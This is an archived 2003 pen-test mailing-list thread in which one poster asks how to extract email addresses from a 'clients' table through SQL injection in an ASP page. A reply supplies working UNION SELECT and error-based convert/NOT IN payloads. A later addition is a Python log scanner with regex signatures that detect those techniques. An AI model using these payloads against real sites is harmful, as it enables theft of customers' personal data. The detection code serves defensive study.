RE: SQL injection - get more values

From: Panos Dimitriou (p.dimitriou@encode-sec.com)
Date: Wed Feb 12 2003 - 10:51:16 PST


    One solution is to try to find the exact columns to perform a union
    select by replacing 1s with 'foo' when you get the error message
    "operand type clash: text is incompatible with int".
    
    Example:
    
    ') union all select sum(email),1,1,1.... from clients--
    until you get "operand type clash: text is incompatible with int". Then
    change the last 1 to 'foo' and continue with 1s, and so on and so
    forth.
    
    The other solution is to try to get all the data through error cycling,
    as you already tried, and use NOT IN as follows:
    
    ' %2b convert(int, (SELECT max(email) FROM clients WHERE email not in
    ('anonat_private','othermailat_private',...))) %2b '
    
    I hope this works.
    
    Panos Dimitriou
    Director, MSS
    
    
    -----Original Message-----
    From: Daniel Savi [mailto:dssat_private] 
    Sent: Wednesday, February 12, 2003 7:49 PM
    To: pen-testat_private
    Subject: SQL injection - get more values
    
    
    
    Hi :)
    
    I'm trying to get some info from the clients table and email field....
    
    I tried this param in gubpage.asp?=...
    ') union select sum(email) from clients--
    and got an error about all queries needed..., so I tried to solve it with
    ') union select sum(email),1,1,1.... from clients--
    until I get: operand type clash: text is incompatible with int
    
    I found this answer in this forum (thanks :)), which was:
    ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
    
    I got this:
    Syntax error converting the varchar value 'anonat_private' to a column of data type int
    
    Now, my problem: how can I get other e-mails from the table knowing one valid value?
    
    I tried this
    ' %2b convert(int, (SELECT email FROM clients WHERE email > 'anonat_private')) %2b '
    but no success.
    
    I think I can use NOT IN, but I'm not sure how to use it with convert...
    
    Any tips are welcome!
    
    Thanks
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
    
    
    
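A defender-side check for the two techniques discussed in this thread, added here as an example and not part of the original exchange: it decodes the logged query string once (so `%2b`, the T-SQL `+` concatenation operator, survives) and flags the UNION column-enumeration pattern and the `convert(int, (SELECT ...))` / `NOT IN` error-cycling pattern in constructed IIS-style log lines. The log field order, the `/gubpage.asp` requests and the sample e-mail value are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (hypothetical format: date time cs-uri-stem cs-uri-query sc-status).
SAMPLE_LOG = """\
2003-02-12 19:49:01 /gubpage.asp id=1 200
2003-02-12 19:49:10 /gubpage.asp id=')+union+select+sum(email),1,1,1+from+clients-- 500
2003-02-12 19:49:22 /gubpage.asp id='+%2b+convert(int,(SELECT+max(email)+FROM+clients+WHERE+email+not+in+('anon@example.test')))+%2b+' 500
2003-02-12 19:50:03 /gubpage.asp id=42&sort=email 200
"""

# Signatures for the two techniques discussed in the thread.
SIGNATURES = {
    # UNION column enumeration: "union [all] select ... from ..."
    "union_enum": re.compile(r"\bunion\s+(?:all\s+)?select\b.*\bfrom\b", re.I | re.S),
    # Error-based extraction: convert(int, (SELECT ...)) forcing a conversion error
    "convert_error": re.compile(r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b", re.I | re.S),
    # Cycling through rows by excluding values already seen
    "not_in_cycle": re.compile(r"\bnot\s+in\s*\(", re.I),
}

def normalize(query):
    # Decode exactly once: '%2b' is the T-SQL '+' concatenation operator,
    # and a second pass would turn that '+' into a space and hide the pattern.
    return unquote_plus(query)

def classify(query):
    """Return the names of every signature that matches the decoded query string."""
    decoded = normalize(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(text):
    """Parse the constructed log format and report each request that matches a signature."""
    findings = []
    for line in text.splitlines():
        parts = line.split(" ", 4)
        if len(parts) != 5:
            continue  # skip malformed lines
        date, time, stem, query, status = parts
        hits = classify(query)
        if hits:
            findings.append({"time": f"{date} {time}", "stem": stem,
                             "status": int(status), "hits": hits})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["stem"], f["status"], ", ".join(f["hits"]))
```

The 500 status on the flagged requests is what the ODBC error messages quoted in the thread typically produce when they bubble up through an ASP page; correlating a run of such errors from one client against the same page is the cheapest way to spot error cycling.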



    This archive was generated by hypermail 2b30 : Wed Feb 12 2003 - 13:24:28 PST